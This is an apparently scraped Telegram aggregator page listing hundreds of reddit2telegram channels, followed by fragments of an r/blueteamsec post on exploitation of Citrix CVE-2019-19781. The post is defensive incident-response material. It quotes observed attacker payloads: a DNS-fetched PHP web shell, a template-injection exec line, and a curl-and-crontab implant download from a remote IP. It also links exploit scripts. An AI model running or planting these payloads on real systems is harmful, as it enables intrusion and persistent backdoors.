en
Feedback
reddit2telegram Announcements

reddit2telegram Announcements

Open in Telegram
1 451
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
Corgi eats it’s own hecking brother 26.0k upvotes /r/corgi 2018 Apr 07 https://redd.it/8aiv1w by @r_corgi
Corgi eats it’s own hecking brother 26.0k upvotes /r/corgi 2018 Apr 07 https://redd.it/8aiv1w by @r_corgi

"You got any games on your phone?" 4.8k upvotes /r/stray 2022 Jul 20 https://redd.it/w3p5xh by @r_stray πŸ† Great achievement!
"You got any games on your phone?" 4.8k upvotes /r/stray 2022 Jul 20 https://redd.it/w3p5xh by @r_stray πŸ† Great achievement! πŸ’ͺ Milestone of 10 subscribers.

701. @r_heraldry 702. @r_bolehland 703. @r_embedded 704. @r_kochin 705. @r_pinetime 706. @r_buildapcsales 707. @r_dalle2 708. @InstaIndia 709. @weirddalle 710. @r_indiandankmemes 711. @dailygratitudee 712. @r_riscv 713. @r_sweden 714. @rshittymoviedetails 715. @r_stray 716. @r_Padres 717. @r_redpillmalayalam 718. @rStableDiffusion 719. @r_chels 720. @uminekoreddit 721. @r_MWII 722. @brasildob 723. @r_Computers 724. @r_FemaleCelebrityBiceps 725. @GameplayMation 726. @fullegoism 727. @r_okbuddychicanery 728. @rAnarchism 729. @r_linuxmemes_1 730. @r_hamsters 731. @r_edgerunners 732. @Mapporncirclejerk 733. @r_askmen 734. @r_witcher3 735. @r_Ultrakill 736. @r_komisan 737. @r_PokemonRMXP 738. @r_ramiayana 739. @r_versus 740. @M2_D4 741. @r_tensei 742. @r_africa 743. @r_science 744. @r_scala 745. @r_onepiecer 746. @r_manga2 747. @r_okbuddyfresca 748. @r_churchofemma 749. @r_gharkekalesh 750. @r_punee 751. @DongistanSub 752. @r_psychology1 753. @r_Literaturememes 754. @r_MuscularCelebrities 755. @r_adhdmeme 756. @r_nijisanji 757. @r_ShitpostTC 758. @chainsawfolk 759. @r_dankinindia 760. @worldnewsvideo 761. @r_copypasta 762. @rExmuslim 763. @r_metalgearsolid 764. @r_thesilphroad 765. @env_chat 766. @r_0sanitymemes 767. @r_outerwilds 768. @r_tessafowler 769. @r_redfall 770. @OldSchoolRuneScape2007 771. @JEENEETardsReddit 772. @SubredditMix 773. @r_deathStranding 774. @rCarsIndia 775. @r_frankocean 776. @r_tylerthecreator 777. @r_playboicarti 778. @r_hiphopheads 779. @r_kendricklamar 780. @r_dotnet 781. @r_nvidia 782. @hub_posts 783. @r_shitposting0 784. @r_travis_scott 785. @passdenied 786. @JEENEETardsReddit2 787. @r_silenthill 788. @r_JapanPics 789. @r_GranTurismo 790. @rantitrampo 791. @r_PSX 792. @stablediffusion_r 793. @premierleague_r 794. @r_DiscoElysium 795. @reddit_argentina 796. @blue_archive_reddit 797. @r_ps3 798. @r_starfield 799. @r_ps2 800. @privacymemes1

601. @cutie_kittycats 602. @nature_eco 603. @wallpapers_desktop_mobile 604. @r_greenandpleasant 605. @r_burdurland 606. @imaginary_maps 607. @r_wireguard 608. @r_coys 609. @r_Tottenham 610. @spider_man_memes 611. @r_starterpacks 612. @r_modelmakers 613. @r_turkey 614. @r_turkeyjerky 615. @r_kgbtr 616. @r_twinpeaks 617. @r_Euroleague 618. @r_Chargers 619. @r_DetroitPistons 620. @r_arknights 621. @r_progmetal 622. @r_AxieInfinity 623. @fate_hot 624. @saber_fgo 625. @foxgirls_hot 626. @hololive_yuri 627. @animemaids_hot 628. @demonslayer_newz 629. @r_androidapps 630. @r_avatar_memes 631. @r_illegallysmolcats 632. @r_LeagueOfLegends 633. @aesthetic_waifu_wallpapers 634. @miku_nakano_fandom 635. @mikuichika_nakano 636. @DragonBallShitposts 637. @DankNaruto 638. @memes_Evangelion 639. @legalcatadvice 640. @JojosBizarreShitposts 641. @r_catgifs 642. @r_PlipPlip 643. @PrivacyGuides 644. @r_yesyesyesyesno 645. @reddit_whatcouldgowrong 646. @dailydankmemes 647. @ShrineOfNino 648. @ShrineOfMiku 649. @OneTrueMegumin 650. @r_ece 651. @redditmovie 652. @r_antiwork 653. @Asus_Tuf 654. @Windows11Group 655. @redditshortfilms 656. @r_zargoryangalaksisi 657. @r_eldenring 658. @r_fpv 659. @r_radiocontrol 660. @r_raspberry_pi 661. @moonshotcryptos 662. @r_lostgeneration 663. @artificialintelligence24x7 664. @reddit196 665. @r_smugs 666. @r_mechanicalkeyboards 667. @r_blueteamsec 668. @CricketShitpost 669. @minimalwallz 670. @r_tamamo 671. @r_algotrading 672. @r_3dprinting 673. @failures_of_capitalism 674. @food_from_reddit 675. @reddit_pride 676. @reddit_animalsbeingderps 677. @reddit_facepalm 678. @r_atheism 679. @r_catastrophicfailure 680. @reddit_elm 681. @r_badcode 682. @r_MadokaMagica 683. @r_workreform 684. @r_Gintama 685. @IndiaSocialSubreddit 686. @footballmanagergames 687. @r_frogs 688. @r_malazan 689. @r_bangalore 690. @r_metalmemes 691. @r_movies2 692. @reddit_gif 693. @FamilyGuyMemes 694. @ImaginationExplorer 695. @r_StardewValley 696. @r_kopyamakarna 697. @rDDLC 698. @r_Jeles 699. @r_Librandu 700. @r_chodi

501. @r_52book 502. @kingKillerChronicle 503. @r_ClashOfClans 504. @rnosleep 505. @WandaVision_reddit 506. @dankscpmemes 507. @tnomod 508. @r_usenet 509. @r_teenagers 510. @grimdank 511. @r_battlecats 512. @AlternateReality 513. @r_PokemonMasters 514. @eye_bleach 515. @gameofthronesbackup 516. @FitAndNaturalbackup 517. @CrossfitGirlsbackup 518. @The100backup 519. @macappsbackup 520. @lostbackup 521. @DetroitBecomeHumanbackup 522. @harrypotterbackup 523. @macsetupsbackup 524. @vfxbackup 525. @NikonBackup 526. @Cinema4Dbackup 527. @TheVampireDiariesbackup 528. @BeautifulFemalesbackup 529. @cheerleadersbackup 530. @SkinnyWithAbsbackup 531. @thefalconandthews_reddit 532. @r_CryptoMoonShot 533. @MoviePosterTG 534. @r_fantasy 535. @CanalLixo 536. @r_oneshot 537. @r_btd6 538. @iamatotalpieceofshit 539. @r_neovim 540. @r_proseporn 541. @r_masterhacker 542. @RussianIsSoHard 543. @r_fatestaynight 544. @R_MildlyPenis 545. @aapexlegends_game 546. @dogecoin_reddit 547. @r_CozyPlaces 548. @r_mildlyvagina 549. @r_confidentlyincorrect 550. @RealRacing3TG 551. @r_thehatedone 552. @GnarMains 553. @r_gentoo 554. @g4m3savisos 555. @RedditGames 556. @r_Windows 557. @intensememes 558. @r_reallifedoodles 559. @r_bapcsalescanada 560. @Idiots_In_Cars 561. @trueoffmychest 562. @chessmemesenglish 563. @durrmemes 564. @r_HermitCraft 565. @r_dark_humor 566. @r_udemyfreebies 567. @instantkarma_XO 568. @r_demisexuality 569. @okbuddyretard 570. @anime_gifs_hub 571. @one_piece_topic 572. @attack_on_titan_topic 573. @r_one_punch_man 574. @Boku_No_Hero_Academia_Topic 575. @Chainsaw_Man_Topic 576. @r_naruto 577. @anime_wallpaper_HQ 578. @r_animememe 579. @r_sandman 580. @r_technoblade 581. @r_sdarksouls 582. @CringyTiktok 583. @AnimeHindiMemes 584. @Octoberstrike 585. @ImaginaryPics 586. @r_okaybuddyhololive 587. @r_okbuddyrintard 588. @NewGreentexts 589. @r_Maybe 590. @Unexpected_Reddit 591. @r_homeassistant 592. @r_StarWarsMemes 593. @r_marvelunlimited 594. @UNBGBBIIVCHIDCTIICBG 595. @r_ToolBand 596. @r_Bloodborne 597. @anime_hot_wallpapers 598. @anime_bikini_waifus 599. @anime_streetwear 600. @mash_kyrie

401. @trans_memes 402. @r_memesITA 403. @r_indianmemes 404. @r_historicalmemes 405. @r_indiangaming 406. @r_MinecraftMemes 407. @r_frugalmalefashion 408. @r_DeepFriedMemes 409. @r_PhoenixSC 410. @r_PoliticalMemes 411. @r_egg_irl 412. @r_technology 413. @r_cursed 414. @r_okbuddyretard 415. @r_HistoryAnimemes 416. @r_PoliticalCompassMemes 417. @r_Arabfunny 418. @r_k12sysadmin 419. @qt_reddit 420. @r_sciencegeeks 421. @r_MCFC 422. @minecraft_en 423. @pc_gaming_memes 424. @r_technicallythetruth 425. @r_fightporn 426. @CosplayReddit 427. @r_FallGuysGame 428. @r_Bertra 429. @r_Ratorix 430. @r_AmongUs 431. @r_Avicii 432. @r_TrashTaste 433. @Genshin_Impact_reddit 434. @r_vexillologycirclejerk 435. @r_bash 436. @r_comedyheaven 437. @r_adhd 438. @WTF_PICTURES 439. @r_thedivision 440. @r_notinteresting 441. @r_leftistvexillology 442. @r_SISwimsuitGirls 443. @r_rimesegate 444. @r_Morocco 445. @r_etymology 446. @r_lifeprotips 447. @r_VirginVsChad 448. @r_zig 449. @r_ShitpostXIV 450. @notme_irl 451. @rselfie 452. @r_unexpectedhamilton 453. @catmemes_reddit 454. @SailingX 455. @r_lal_salaam 456. @ranalog 457. @r_valorant 458. @rdrawing 459. @r_abandoned 460. @r_ExpandDong 461. @r_IKEAhacks 462. @r_Ferrets 463. @r_tupac 464. @r_PuppyLinux 465. @r_MiraculousLadybug 466. @r_SuperModelIndia 467. @rmallubabes 468. @r_jacksepticeye 469. @r_cyberpunk2077 470. @r_TikTok_Tits 471. @r_perfecttiming 472. @r_holdmybeer 473. @rhyderabad 474. @kstxi 475. @subgeniuschurch 476. @r_00ag9603 477. @eristocracia 478. @r_formuladank 479. @r_theexpanse 480. @WhatsWrongWithYourDog 481. @r_progresspics 482. @r_DaniDev 483. @r_okbuddybaka 484. @r_malaysia 485. @frontlinegirls 486. @r_programmerhumor 487. @stardewvalley_en 488. @animals_telegram 489. @r_aviation 490. @anime_titties 491. @rkolc 492. @r_videomemes 493. @r_wholesome 494. @r_weirdcore 495. @r_denmark 496. @r_outrun 497. @r_Tipovi 498. @r_Windows_Redesign 499. @r_traumacore 500. @wallstreetnewsitalia

301. @r_simpsonshitpost 302. @r_nosafetysmokingfirst 303. @okbuddyretardd 304. @memanon 305. @r_houkai3rd 306. @r_Blursedimages 307. @r_boxoffice 308. @r_Otonokizaka 309. @r_ChinaDress 310. @r_rust 311. @r_polandball 312. @r_iNoobChannel 313. @r_publicfreakout 314. @r_ItemShop 315. @r_gunners 316. @r_moviescirclejerk 317. @r_moviequotes 318. @r_movieclub 319. @quotesporn 320. @r_BokuNoMetaAcademia 321. @MemeArea 322. @r_television 323. @ChannelZeroNetwork 324. @PraiseTheCameraMan 325. @lyricalquotes 326. @MinecraftModded 327. @r_scp 328. @Tumblrcontent 329. @wutttttttt 330. @rdataisbeautiful 331. @r_imgoingtohellforthis 332. @r_WritingPrompts 333. @slavelabour 334. @r_scrubs 335. @northkoreanews 336. @imaginarylands 337. @r_animalcrossing 338. @r_php 339. @Awwducational 340. @worldnews_reddit 341. @r_propagandaposters 342. @r_persona5 343. @Next_Level_Skills 344. @programmingreddit 345. @MSILaptops 346. @r_ODSP 347. @rJackSucksAtLife 348. @r_deepintoutube 349. @rnerds 350. @redmeme 351. @r_nofap 352. @r_battlestations 353. @r_ilMasseo 354. @MarbleRacing 355. @r_rainbow6 356. @r_adporn 357. @r_dota2 358. @arkotonog 359. @holdmycosmo 360. @r_iww 361. @Emulationx 362. @onepunchmansubreddit 363. @Fgrandorder 364. @r_truefilm 365. @r_KaIT 366. @r_hackintosh 367. @AssholeDesign 368. @r_hololive 369. @didntknowiwantedthat 370. @r_documentaries 371. @r_diy 372. @news_reddit 373. @r_Julia 374. @animewaifuss 375. @r_thelastairbender 376. @rickandmorty_en 377. @CallOfDutyMobile_reddit 378. @okbuddypersona 379. @r_furrypasta 380. @r_MashuKyrielight 381. @r_bodybuilding 382. @BrandNewSentence 383. @r_DataHoarder 384. @r_yakuzagames 385. @r_lua 386. @rekabufeed 387. @r_rallyporn 388. @chessmemes 389. @Reddit_NBA 390. @odd_takes 391. @musictheorymemes 392. @r_goodanimemes 393. @r_onejob 394. @r_kanye 395. @r_crackwatch 396. @r_ihadastroke 397. @mangareddit 398. @r_stonks 399. @CallOfDutyWarzone_reddit 400. @r_Davie504

201. @r_bakchodi 202. @manpill 203. @r_devilmaycry 204. @r_nootropics 205. @r_libertarian 206. @r_kratom 207. @r_memetemplatesofficial 208. @reddit_lego 209. @DoctorWhumour 210. @r_sweatypalms 211. @r_beamazed 212. @r_FantasyPL 213. @asexualityonreddit 214. @r_trashpandas 215. @r_bugbounty 216. @r_kemonomimi 217. @r_devops 218. @r_systemadmin 219. @r_corgi 220. @r_gamingmemes 221. @r_educationalgifs 222. @r_Celebs 223. @r_tfirl 224. @r_kcv 225. @r_magiarecord 226. @r_hearthstone 227. @grndordr 228. @r_shitpostcrusaders 229. @r_plsnobulli 230. @TheyDidTheMath 231. @EliteDanger0us 232. @Mootivati0n 233. @InstaReality 234. @FakeHistoryP0RN 235. @ThereWasAnAttempt 236. @churchoftohsaka 237. @r_vexillology 238. @r_youshouldknow 239. @BikiniMoe 240. @r_SatisfactoryGame 241. @reddit_wtf 242. @reddit_Dota2 243. @r_BikiniBottomTwitter 244. @r_CursedComments 245. @r_Pony_irl 246. @soccerx 247. @r_thatsinsane 248. @r_apexlegends 249. @ATBGE 250. @AAAAAGGHHHH 251. @r_araragi 252. @WatchPeopleVim 253. @VaporwaveAesthetics 254. @r_suicidewatch 255. @giveaway_gift 256. @COMPLETE_ANARCHY 257. @sffpc 258. @r_coding 259. @r_pubgmobile 260. @r_animegifs 261. @r_KamenRider 262. @r_piano 263. @reddit_brasil 264. @r_kerala 265. @r_emacs 266. @r_edc 267. @r_combatfootage 268. @ani_bm 269. @r_Unity3D 270. @r_wallpapers 271. @r_SuperSentai 272. @antimlms 273. @AzurLane_sub 274. @Dreamcatcher_reddit 275. @r_moviesuggestions 276. @prolifetipss 277. @rAnimewallpaper 278. @r_invites 279. @reddit_OSHA 280. @r_communism 281. @r_Sino 282. @TerribleFacebookMemes 283. @NatureIsLit 284. @comedynecrophilia 285. @rdogelore 286. @reddit_trackballs 287. @r_moescape 288. @r_imaginarylandscapes 289. @r_dgb 290. @bollybng 291. @r_apphookup 292. @medieval_memes 293. @r_opm 294. @r_preppers 295. @cryptoinstantnews2 296. @r_League_Of_Memes 297. @vtuber_en 298. @r_islam_channel 299. @r_antimeme 300. @soccermemer

101. @r_osugame 102. @r_FreeGamesOnSteam 103. @reddit_cartoons 104. @r_technope 105. @rcarporn 106. @r_desktops 107. @r_vinyl 108. @r_creepy 109. @r_HentaiMemes 110. @rareinsults 111. @r_sbubby 112. @loliconsunite 113. @r_privacy 114. @r_WikiLeaks 115. @reddit_androiddev 116. @proceduralgeneration 117. @r_gtaonline 118. @ichimechtenleben 119. @IngressPrimeFeedback 120. @soccer_reddit 121. @r_reddevils 122. @NFL_reddit 123. @r_texans 124. @r_xxxtentacion 125. @r_quotesporn 126. @r_getmotivated 127. @r_Podcasts 128. @r_imaginary_network 129. @r_MaxEstLa 130. @r_SelfHosted 131. @r_InternetIsBeautiful 132. @r_thinkpadsforsale 133. @redditvideos 134. @rsoccerbetting 135. @r_xboxone 136. @LivestreamFail 137. @facepalmers 138. @r_ComedyCemetery 139. @r_latestagecapitalism 140. @ShitLiberalsSay 141. @redditpiracy 142. @r_ContraPoints 143. @IngressReddit 144. @YoutubeCompendium 145. @oddly_satisfy 146. @jenkinsci 147. @redditart 148. @r_interestingasfuck 149. @r_RimWorld 150. @r_woooosh 151. @instant_regret 152. @r_djs 153. @r_marvelstudios 154. @r_creepyasterisks 155. @AllTwitter 156. @r_TIHI 157. @r_therewasanattempt 158. @r_WatchPeopleDieInside 159. @r_youtubehaiku 160. @sub_eminem 161. @r_jailbreak 162. @reddit2telegram 163. @r_shittyramen 164. @bestoftweets 165. @blackpeopletweets 166. @whitepeopletweets 167. @r_trackers 168. @r_vault_hunters 169. @r_CoolGithubProjects 170. @r_evilbuildings 171. @r_linuxmemes 172. @r_BlackMagicFuckery 173. @Rattit 174. @r_engrish 175. @coolguides 176. @r_climbing 177. @r_climbingcirclejerk 178. @tyingherhairup 179. @r_designporn 180. @r_cricket 181. @r_LiverpoolFC 182. @r_econ 183. @r_animearmpits 184. @r_megane 185. @rSurrealMemes 186. @r_thinkpad 187. @r_apple 188. @r_funnystories 189. @r_shitposters_paradise 190. @r_nottheonion 191. @r_izlam 192. @GGPoE 193. @r_terraria 194. @r_breadtube 195. @r_war 196. @r_cutelittlefangs 197. @admeme 198. @r_channels_tifu 199. @r_vinesauce 200. @r_freegamefindings

⬇️ All active channels: 01. @r_gifs 02. @r_jokes 03. @r_funny 04. @datascientology 05. @asiangirlsbeingcute 06. @r_behindthegifs 07. @pythondaily 08. @r_bitcoin 09. @RedditHistory 10. @news756 11. @r_pics_redux 12. @RedditCats 13. @r_til 14. @awwnime 15. @r_mlp 16. @ya_metro 17. @r_Showerthoughts 18. @r_me_irl 19. @r_dankmemes 20. @r_HighQualityGifs 21. @PoliticalHumor 22. @OldSchoolCool 23. @rddit 24. @denpasong 25. @reddit_all 26. @r_AskReddit 27. @r_explainmelikeimfive 28. @r_changemyview 29. @just_hmmm 30. @programmer_humor 31. @dailyfoodporn 32. @r_overwatch 33. @r_cryptocurrency 34. @r_listentothis 35. @r_ramen 36. @r_fantheories 37. @r_SlimeRancher 38. @r_googleplaydeals 39. @Indiancelebs 40. @r_pcmasterrace 41. @GIFFFs 42. @r_wow 43. @r_minecraft 44. @r_wholesomememes 45. @r_streetwear 46. @BetterEveryLoop 47. @reddit_fashion 48. @r_opensignups 49. @r_BigAnimeTiddies 50. @r_Damnthatsinteresting 51. @fakealbumcovers 52. @dash_cams 53. @r_mild 54. @r_porn 55. @r_formula1 56. @r_cpp 57. @r_gaming 58. @r_dontdeadopeninside 59. @r_linux 60. @reddit_android 61. @r_TechSupportGore 62. @r_indiaa 63. @r_dndgreentext 64. @r_dndmemes 65. @r_chemicalreactiongifs 66. @r_wheredidthesodago 67. @r_SwitchHacks 68. @r_books 69. @r_suggest 70. @r_space 71. @r_wasletztepreis 72. @r_greentext 73. @r_crappyoffbrands 74. @r_chemistry 75. @r_vim 76. @r_talesfromtechsupport 77. @r_PewdiepieSubmissions 78. @r_disneyvacation 79. @R_Punny 80. @r_mapporn 81. @r_softwaregore 82. @r_crappydesign 83. @r_comics 84. @r_remotejs 85. @streetmoe 86. @r_foxes 87. @r_digimon 88. @r_furry 89. @r_ik_ihe 90. @r_mildlyinfuriating 91. @r_Animemes 92. @r_wellthatsucks 93. @rtf2memes 94. @r_arma 95. @r_grandorder 96. @r_2meirl4meirl 97. @r_photoshopbattles 98. @r_pornhubcomments 99. @r_animeirl 100. @indepthstories

Weekend news πŸŽ‰ Welcome to newly active channels: @indiandankmemesreddit, @r_RedDeadOnline, @reddit_infographic. 🎈🎈 πŸ† Channel of the week: @r_persona5. Join and enjoy! πŸ”₯ Hottest channels of the week: @r_combatfootage, @r_propagandaposters, @loliconsunite. πŸ™‹ Q: How can I help? A: Support us on Patreon and promote your favorite channels! Q: How to make similar channels? A: Ask at @r_channels or use manual at https://github.com/Fillll/reddit2telegram. Q: Where to donate? A: Patreon: https://www.patreon.com/reddit2telegram. Other ways: https://bit.ly/r2t_donate.

πŸ”₯ This seal has reached peak level of chill 102.9k upvotes /r/NatureIsFuckingLit 2021 Jun 03 https://redd.it/nrote1 by @NatureIsLit πŸ† Great achievement! πŸ’ͺ Milestone of 666 subscribers.

Jared, the man behind the famous South Park WoW cosplay has passed away due to Covid-19. RIP https://www.youtube.com/watch?v=C3I4wpHshuw&ab_channel=mirrodin14 148.1k upvotes /r/videos 2021 Jan 03 https://redd.it/kpw1i4 by @redditvideos πŸŽ‚πŸŽ‚πŸŽ‚πŸŽ‚πŸŽ‚ 🎁 Today @redditvideos is 5 years old. πŸŽ‰ Congratulations! 🎈

Live Betting - Live discussion for all your bets Live Betting - Live discussion for all your bets 237 upvotes /r/SoccerBetting 2022 Dec 28 https://redd.it/zx4oro by @rsoccerbetting πŸŽ‚πŸŽ‚πŸŽ‚πŸŽ‚πŸŽ‚ 🎁 Today @rsoccerbetting is 5 years old. πŸŽ‰ Congratulations! 🎈

trolling) &#x200B; ./var/tmp/netscaler/portal/templates/REDACTED.xml.ttc2: $output .= $stash->get(['template', 0, 'new', [ { 'BLOCK' => 'exec(\'dig cmd.irannetworkteam.org txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml\');' } ]]); for the domain Domain Name: IRANNETWORKTEAM.ORG Registry Domain ID: D402200000012341868-LROR Registrar WHOIS Server: whois.namesilo.com Registrar URL: www.namesilo.com Updated Date: 2020-01-11T14:17:00Z Creation Date: 2020-01-11T13:46:37Z the TXT record for the domain currently returns > set querytype=TXT > cmd.IRANNETWORKTEAM.ORG Non-authoritative answer: cmd.IRANNETWORKTEAM.ORG text = "<?php @eval(base64_decode(strrev(@$_POST[REDACTED])));?>" So * pull first stage from DNS TXT field * uploads second/dynamic stage via POST in specific variable This post is curated by the team at NCC Group/Fox-IT - [https://www.nccgroup.trust/](https://www.nccgroup.trust/uk/) 206 upvotes /r/blueteamsec 2020 Jan 11 https://redd.it/en4m7j by @r_blueteamsec πŸŽ‚πŸŽ‚ 🎁 Today @r_blueteamsec is 2 years old. πŸŽ‰ Congratulations! 🎈

[https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/) * SANS observed payloads * [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/) * SANS observe crypto miners on January 12th * [https://twitter.com/sans\_isc/status/1216375320846176261](https://twitter.com/sans_isc/status/1216375320846176261) * TrustedSec Honeypot analysis * [https://www.trustedsec.com/blog/netscaler-honeypot/](https://www.trustedsec.com/blog/netscaler-honeypot/) * AlienVault OTX pulse - [https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489](https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489) * FireEye - [https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html](https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html) * FireEye - NOTROBIN - [https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html](https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html) * German Government [https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove\_bds/](https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/) **Doozer Exploitation Intelligence** [https://twitter.com/michel228/status/1216771783656910849](https://twitter.com/michel228/status/1216771783656910849) Found this in the logs: curl http://NN.NN.NN.NN:8081/2a9c665438cd0c8a9c4a25b2a6e0885f -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &" Payload dropped hash (SHA256): 177c3d8389c71065c2ff2e74ab190486ade95869f6655a1e544f5ee41334517e This is a 2MB implant written in Go - uses AES, persistence via Cron etc. [u/undermyne](https://www.reddit.com/u/undermyne/) **Exploitation Intelligence** *I just spent a few hours cleaning up an exploited VPX for a customer. As observed below, the ns.conf was compromised (copied and I assume the copy was grabbed). The passwd file was also taken (nothing of import in that one) and the* *personalbookmark.pl* *file was modified. Following cleanup there were 5 active processes running under nobody and one of them would automatically restart. To be safe I reverted to a backup from prior to the exploit being released. Patched and returned to service and all is well. If the bind logs indicate that a file was deleted you can find the deleted file in the /var/tmp/netscaler/portal/templates directory (or other relevant tmp folders). The XML files are your best bet at trying to figure out what was attempted. Thankfully the 9 attempts on the one I just fixed looked like they were basically trying to sort out what they could and couldn't do. Start with the httpaccess log, then use time stamps to search bind logs, and then see what was done with the xml.ttc2 files in the tmp folders.* **NCC Group/Fox-IT Exploitation Intelligence** * Actor 1 observed January 11th we can see exploiting this vulnerability has the following log patterns (where the filename is a random alpha upper/lower case .xml). The attacker is observed using cron for persistence. * Actor 1 observed January 12th changed their payload to drop a binary called netscalerd which is a coinminer * [https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection](https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection) &#x200B; POST /vpn/../vpns/portal/scripts/newbm.pl GET/vpn/../vpns/portal/XIaoLBFveLyvUfUGiWAwElIJNERhpmrBM.xml * Actor 2 observed January 13 around 15:30 UTC (not clear if someone is

[https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix\_CVE-2019-19781](https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix_CVE-2019-19781) (Russian - Windows Binary) * [https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix\_netscaler\_rce\_cve\_2019\_19781.rb](https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix_netscaler_rce_cve_2019_19781.rb) Added to intrigue-core a week or so ago and then improved it when additional details came out by [u/jcran](https://www.reddit.com/u/jcran/) * [https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77](https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77) OWASP's * [https://github.com/x1sec/citrixmash\_scanner](https://github.com/x1sec/citrixmash_scanner) **Commercial Checkers** * [https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and](https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and) Tenable's **Exploits** * [https://github.com/projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781) * [https://github.com/ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781) * [https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py](https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py) * [https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py](https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py) * [https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55](https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55) * [https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md](https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md) * Exploitation possible with two GETs * [https://twitter.com/mpgn\_x64/status/1216792205723041795](https://twitter.com/mpgn_x64/status/1216792205723041795) * Exploitation possible without directory traversal * [https://twitter.com/mpgn\_x64/status/1216802182760226817](https://twitter.com/mpgn_x64/status/1216802182760226817) **Post Exploitation** * [dozer.nz/citrix-decrypt/](https://t.co/xqCq1qHlp7?amp=1) **Vulnerability Intelligence** * [https://www.shodan.io/](https://www.shodan.io/) query: 'vuln:cve-2019-19781' * [https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/](https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/) \- 25,000 endpoints vuln * Alternate data sets as of 18:00 on the 12th suggest more **Honeypot** * [https://github.com/MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot) **Exploitation Intelligence** * Mass Scanning / Exploitation Observed on Jan 12th - [https://twitter.com/bad\_packets/status/1216291048185421830](https://twitter.com/bad_packets/status/1216291048185421830) * Mass Exploitation Observed on Jan 10th - [https://twitter.com/bad\_packets/status/1215431625766424576](https://twitter.com/bad_packets/status/1215431625766424576) * GreyNoise tagging - [https://twitter.com/GreyNoiseIO/status/1215818626055528453](https://twitter.com/GreyNoiseIO/status/1215818626055528453) * [https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781](https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781) * SANS honeypot uptick - * 15:42 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1216022602436808704](https://twitter.com/sans_isc/status/1216022602436808704) * 4:46 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1215857528749338624](https://twitter.com/sans_isc/status/1215857528749338624) * Blog:

[https://x1sec.com/CVE-2019-19781-DFIR](https://x1sec.com/CVE-2019-19781-DFIR) * via SSH - [https://twitter.com/cyb3rops/status/1215974764227039238](https://twitter.com/cyb3rops/status/1215974764227039238) (caveat: .. doesn't need to be in the URL in all exploitation scenarios) &#x200B; ssh -t [address] 'grep -r "/../vpns" /var/log/http*' **Vendor mitigation** * [https://support.citrix.com/article/CTX267679](https://support.citrix.com/article/CTX267679) * [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027) Citrix have now (8pm UTC Jan 11) published when they expect patched builds to be available - from [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027) \- some are saying patches are available already to large clients * 10.510.5.70.x 31st January 2020 * 11.111.1.63.x 20th January 2020 * 12.012.0.63.x 20th January 2020 * 12.112.1.55.x 27th January 2020 * 13.013.0.47.x 27th January 2020 Citrix blog by their CISO - [https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/) **3rd party mitigation steps / advice** * 